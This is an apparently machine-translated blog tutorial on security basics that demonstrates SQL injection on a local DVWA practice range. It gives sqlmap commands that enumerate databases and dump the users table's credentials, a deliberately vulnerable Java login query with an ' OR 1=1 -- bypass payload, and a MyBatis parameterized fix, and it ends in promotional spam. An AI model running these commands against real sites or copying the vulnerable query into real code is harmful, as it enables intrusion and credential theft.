In today's digital age, cybersecurity has become a global focus. With the popularization of the Internet and the rapid development of information technology, the threat of network attacks and data leakage is also increasing. To protect personal privacy and corporate sensitive information, the cybersecurity industry is booming.
This article will briefly introduce the definition and attributes of network security, and demonstrate the attack and protection of web security through the case of sql injection .
*one,*
*Introduction to Network Security*
Just like relatives and friends always misunderstand us who are learning computers, "Do you know how to repair computers when you learn computers? My computer just broke down. Please help me look at it?"
Everyone also has some misunderstandings about security, such as joking, "You guys who are security are all hackers? Can you help me steal a QQ account/game account?"
So what exactly is cybersecurity? Baidu Encyclopedia explains "network security" like this:
We engage in security, the goal is to protect network security! So of course we are not hackers!
The thinking of hackers is mainly to attack and destroy the network. This is a reverse attack. When we do security testing, we not only need to learn the thinking mode of hackers and use reverse attacks to detect security vulnerabilities. Positive to protect the security of the network.
Let's understand some common cybersecurity terms:
Image source https://zhuanlan.zhihu.com/p/495714886
two
*Five Attributes of Network Security*
Security has five attributes, namely confidentiality, integrity, availability, controllability and non-repudiation. **These five attributes are applicable to a wide range of fields such as education, entertainment, medical care, transportation, national security, power supply, and communication of the national information infrastructure, and are also the basic characteristics of our security field.
Common web vulnerabilities , signature and encryption and decryption , data security , security configuration , etc. are all related to these five attributes:
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
1. Confidentiality:
**lEncryption: **Use encryption algorithm to encrypt sensitive data, and only those who have the decryption key can decrypt it.
**lAccess Control:** Restrict access to sensitive information and use authentication mechanisms to verify user identity.
**l Data Classification and Labeling:** Classify and label data according to sensitivity level to ensure only authorized personnel have access.
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
2. Integrity:
**lDigital signature: **Use encryption technology to generate digital signatures to verify the integrity and authenticity of data.
**l Hash function: ** Use the hash algorithm to generate the hash value of the data to detect whether the data has been tampered with.
**lRedundancy check:** Detect and correct errors in data transmission through redundancy check mechanism (such as parity check, cyclic redundancy check, etc.).
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
3. Availability:
**lRedundant design: **Through technologies such as backup, failover and load balancing, the fault tolerance and availability of the system are improved.
**l Capacity planning: **Ensure that the system has sufficient storage capacity and computing resources to meet user needs.
**l Disaster recovery plan: **Develop and implement a disaster recovery plan to ensure that the system and data can be quickly restored in the event of a disaster.
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
4. Controllability:
**lLogin and audit log: **Record system and user operation activities for tracking and auditing.
**lDigital watermark:**Embed a unique identifier into the data to track and confirm the source and usage of the data.
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
5. Non-repudiation:
**lDigital signature: **Use digital certificate and asymmetric encryption technology to sign the data to ensure the non-repudiation of the sender.
**l Timestamp:** Use a trusted timestamp service to record data and operations.
*three*
*Practical defense drill*
After learning the above terms, we will conduct a practical exercise through a simple case to further understand network security:
SQL injection vulnerability is a kind of web security vulnerability. By injecting malicious SQL code into the application, the attacker can perform unauthorized database operations, obtain sensitive data or destroy the database. Combined with other vulnerabilities, the server can even obtain the authority.
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
1. Use the sqlmap tool for SQL injection attacks
Use the SQL injection practice module of the locally built DVWA vulnerability shooting range
*Related environment reference:*
① ****DVWA* * Environment construction: * * https://blog.csdn.net/qq_58793845/article/details/128288260* *
② ****SQLMAP* * Tool use: * * https://blog.csdn.net/qq_61553520/article/details/130156864* *
url:http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
**2.** Use the sqlmap tool for sql injection point detection
payload:python sqlmap.py -u “url” --batch --cookie=“cookie”
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
3. There is a sql injection vulnerability in the detection parameter id as shown in the figure
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
4. Inject the database name
payload:python sqlmap.py -u “url” --batch --cookie=“cookie” --dbs
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
5. Formulate the database and explode the table name
payload:python sqlmap.py -u “url” --batch --cookie=“cookie” -D dvwa --tables
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
6. Exploding column names
payload:python sqlmap.py -u “url” --batch --cookie=“cookie” -D dvwa -T users --columns
━ ━ ━ ━ ━ ━ ━ ━ ━ ━
7. Exploding username and password fields
payload:python sqlmap.py -u “url” --batch --cookie=“cookie” -D dvwa -T users -C user,password --dump
*Four*
* ***Looking at the generation and protection of sql injection from java code****
* *
Suppose there is a scenario with a login page, the user needs to enter a user name and password, and the system uses the input parameters to query whether the user exists in the database.
At this point, use the JDBC API to directly interact with the database:
String username = request.getParameter(“username”);
String password = request.getParameter(“password”);
String sql = “SELECT * FROM users WHERE username = '” + username + “’ AND password = '” + password + “'”;
Statement statement = connection.createStatement();
ResultSet result = statement.executeQuery(sql);
In this code, the username and password entered by the user are directly spliced into the SQL query statement, so that the attacker can attack the database by injecting malicious SQL code into the username or password. For example, an attacker could enter ' OR 1=1 – in the username field , which would cause the query to become:
SELECT * FROM users WHERE username = ‘’ OR 1=1 --’ AND password = ‘’
Since OR 1=1 is always true, this query will return records for all users. Injected comment symbol – will comment out the following AND password = '' , thereby bypassing password verification.
To prevent SQL injection attacks, it is best to use parameterized queries and prepared statements. The following takes MyBatis as an example to show the sample code for preventing SQL injection:
**
**
First, in the Mapper XML file of MyBatis, we need to use elements to define SQL query statements, and use #{} to refer to query parameters. For example:
SELECT * FROM users WHERE username = #{username} AND password = #{password}
Next, in the Java code, we need to use MyBatis's SqlSessionFactory and SqlSession class to execute SQL queries, for example:
String username = “test”;
String password = “test”;
Map<String, String> paramMap = new HashMap<>();
paramMap.put(“username”, username);
paramMap.put(“password”, password);
SqlSession sqlSession = sqlSessionFactory.openSession();
try {
User user = sqlSession.selectOne(“getUserByNameAndPassword”, paramMap);
// process the query result
} finally {
sqlSession.close();
}
In the above SQL query statement, we used the #{} placeholder to represent the query parameters, so that MyBatis will automatically precompile and escape the parameters to improve the security and performance of the query, thus preventing SQL injection attacks .
Note that the #{} placeholder is used here, not the {} placeholder, becausePlaceholders, because {} is a simple string replacement, that is, the incoming value is directly spliced into the SQL statement, and single quotes will not be automatically added, so the risk of SQL injection cannot be prevented.
at last
Statistics show that there is currently a gap of 1.4 million cyber security talents in China...
Whether you are a cyber security enthusiast or a practitioner with certain work experience,
whether you are a fresh graduate or a professional who wants to change jobs ,
you all need this job. super super comprehensive information
almostBeats 90% of self-study materials on the market
And covers the entire network security learning category
to bookmark it!It will definitely help your study!
Friends, if you need a full set of network security introduction + advanced learning resource package, you can click to get it for free (if you encounter problems with scanning codes, you can leave a message in the comment area to get it)~
CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing
1. A full set of toolkits and source codes necessary for network security
2. Video Tutorial
Although there are a lot of learning resources on the Internet, they are basically incomplete. This is the online security video tutorial I recorded myself. I have supporting video explanations for every knowledge point on the road map.
3. Technical documents and e-books
The technical documents are also compiled by myself, including my experience and technical points of participating in the network protection operation, CTF and digging SRC vulnerabilities.
I have also collected more than 200 e-books on Internet security, basically I have popular and classic ones, and I can also share them.
4. NISP, CISP and other certificate preparation packages
5. Information security engineer exam preparation spree
6. Interview questions for network security companies
The interview questions about cyber security that have been sorted out in the past few years, if you are looking for a job in cyber security, they will definitely help you a lot.
Friends, if you need a full set of network security introduction + advanced learning resource package, you can click to get it for free (if you encounter problems with scanning codes, you can leave a message in the comment area to get it)~
CSDN spree: "Hacker & Network Security Introduction & Advanced Learning Resource Pack" free sharing